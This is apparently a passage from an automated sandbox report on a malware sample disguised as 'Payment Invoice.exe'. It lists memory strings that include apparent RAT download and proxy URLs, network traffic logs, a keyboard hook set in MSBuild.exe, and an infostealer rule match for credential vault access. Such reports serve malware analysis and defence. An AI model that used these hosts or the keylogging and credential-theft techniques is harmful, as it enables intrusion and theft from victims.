                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319640000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318543000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crls.pki.goog/gts1p5/ZLjfCcC0tzo.crl0
                Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: MSBuild.exe, 00000005.00000002.3068273455.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3068273455.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3068273455.000000000299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.orako.co.ke
                Source: MSBuild.exe, 00000005.00000002.3068273455.00000000028DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.orako.co.ke0
                Source: Payment Invoice.exe, 00000000.00000002.3284545717.0000016314B5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319640000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318543000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01
                Source: MSBuild.exe, 00000005.00000002.3068273455.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3068273455.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3068273455.000000000299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://orako.co.ke
                Source: Payment Invoice.exe, 00000000.00000002.3284545717.0000016314B5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319640000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318543000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1p5.der0
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316721000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3068273455.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163171A7000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163172F6000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163172BB000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163179E3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163171F4000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E37000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.freecsstemplates.org
                Source: MSBuild.exe, 00000005.00000002.3065106741.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                Source: MSBuild.exe, 00000005.00000002.3068273455.0000000002861000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3065106741.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: MSBuild.exe, 00000005.00000002.3068273455.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: MSBuild.exe, 00000005.00000002.3068273455.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/get/65e86da2d21c1d3728ee0ab8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com:443/
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B8D000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163198E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto&display=swap
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163198E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://globalurl.fortinet.net:8010/XX/YY/ZZ/CI/MGPGHGPGPFGHDDPFGGHGFHBGCHEGPFBGAHAH)
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ktxcomay.com.vn
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                Source: unknownNetwork traffic detected: HTTP traffic on port 52100 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51067 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51342 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52576 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55108 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53218
                Source: unknownNetwork traffic detected: HTTP traffic on port 54797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53213
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53576
                Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52105 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53211
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54789
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51622 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53583
                Source: unknownNetwork traffic detected: HTTP traffic on port 53614 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52020 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53580
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54790
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50513
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50515
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51079 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52013
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53585
                Source: unknownNetwork traffic detected: HTTP traffic on port 51784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52017
                Source: unknownNetwork traffic detected: HTTP traffic on port 50515 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52260 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52142
                Source: unknownNetwork traffic detected: HTTP traffic on port 55052 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52260
                Source: unknownNetwork traffic detected: HTTP traffic on port 51778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50525
                Source: unknownNetwork traffic detected: HTTP traffic on port 51903 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53119
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52267
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52025
                Source: unknownNetwork traffic detected: HTTP traffic on port 52025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52144
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52149
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52268
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                Source: unknownNetwork traffic detected: HTTP traffic on port 53576 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52270
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52153
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51901
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51469
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54857
                Source: unknownNetwork traffic detected: HTTP traffic on port 51469 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51903
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51342
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54850
                Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54856
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51468
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54855
                Source: unknownNetwork traffic detected: HTTP traffic on port 51621 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52153 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52666 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51908
                Source: unknownNetwork traffic detected: HTTP traffic on port 51787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51911
                Source: unknownNetwork traffic detected: HTTP traffic on port 51632 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51252 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51901 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51633 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53218 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55049
                Source: unknownNetwork traffic detected: HTTP traffic on port 55059 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52578
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52576
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55052
                Source: unknownNetwork traffic detected: HTTP traffic on port 52578 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55050
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52581
                Source: unknownNetwork traffic detected: HTTP traffic on port 54268 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53213 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52142 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52102
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51252
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55059
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52100
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52105
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52103
                Source: unknownNetwork traffic detected: HTTP traffic on port 52103 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53583 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53119 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51459 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53168
                Source: unknownNetwork traffic detected: HTTP traffic on port 53165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53167
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55108
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55109
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51787
                Source: unknownNetwork traffic detected: HTTP traffic on port 55111 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51784
                Source: unknownNetwork traffic detected: HTTP traffic on port 54857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55110
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55111
                Source: unknownNetwork traffic detected: HTTP traffic on port 51070 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51625 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52270 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53616
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53614
                Source: unknownNetwork traffic detected: HTTP traffic on port 53211 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54268
                Source: unknownNetwork traffic detected: HTTP traffic on port 51911 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53612
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53611
                Source: unknownNetwork traffic detected: HTTP traffic on port 52017 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51075 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52664 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53611 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52102 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55049 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52144 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52668
                Source: unknownNetwork traffic detected: HTTP traffic on port 50530 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51459
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                Source: unknownNetwork traffic detected: HTTP traffic on port 52268 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52663
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52666
                Source: unknownNetwork traffic detected: HTTP traffic on port 54856 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52664
                Source: unknownNetwork traffic detected: HTTP traffic on port 52149 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55260
                Source: unknownNetwork traffic detected: HTTP traffic on port 53616 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51625
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51624
                Source: unknownNetwork traffic detected: HTTP traffic on port 53585 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51627
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51067
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51621
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50530
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51622
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51070
                Source: unknownNetwork traffic detected: HTTP traffic on port 50513 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51075
                Source: unknownNetwork traffic detected: HTTP traffic on port 55050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53215 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51079
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51632
                Source: unknownNetwork traffic detected: HTTP traffic on port 54850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51633
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51630
                Source: unknownNetwork traffic detected: HTTP traffic on port 54790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55109 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50525 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52267 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55260 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52581 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52668 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53580 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51778
                Source: unknownNetwork traffic detected: HTTP traffic on port 51630 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55110 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51774
                Source: unknownNetwork traffic detected: HTTP traffic on port 52663 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53612 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53165
                Source: unknownNetwork traffic detected: HTTP traffic on port 54789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51624 -> 443
                Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.4:51252 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.4:54268 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:55260 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior

                System Summary

                barindex
                Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: initial sampleStatic PE information: Filename: Payment Invoice.exe
                Source: Payment Invoice.exeStatic file information: Suspicious name
                Source: C:\Windows\System32\WerFault.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C6E2915_2_00C6E291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C64A985_2_00C64A98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C6AC5F5_2_00C6AC5F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C63E805_2_00C63E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C641C85_2_00C641C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_060FD8605_2_060FD860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_060F18B05_2_060F18B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_061166285_2_06116628
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_061155E05_2_061155E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0611B2705_2_0611B270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_061130A85_2_061130A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_06117DC05_2_06117DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_061176E05_2_061176E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0611E4085_2_0611E408
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_061123505_2_06112350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_061100405_2_06110040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_06115D1B5_2_06115D1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_061100075_2_06110007
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7076 -s 101532
                Source: Payment Invoice.exeStatic PE information: No import functions for PE file found
                Source: Payment Invoice.exe, 00000000.00000000.1819091693.0000016314A22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOvifahezapemetil0 vs Payment Invoice.exe
                Source: Payment Invoice.exeBinary or memory string: OriginalFilenameOvifahezapemetil0 vs Payment Invoice.exe
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: cryptnet.dllJump to behavior
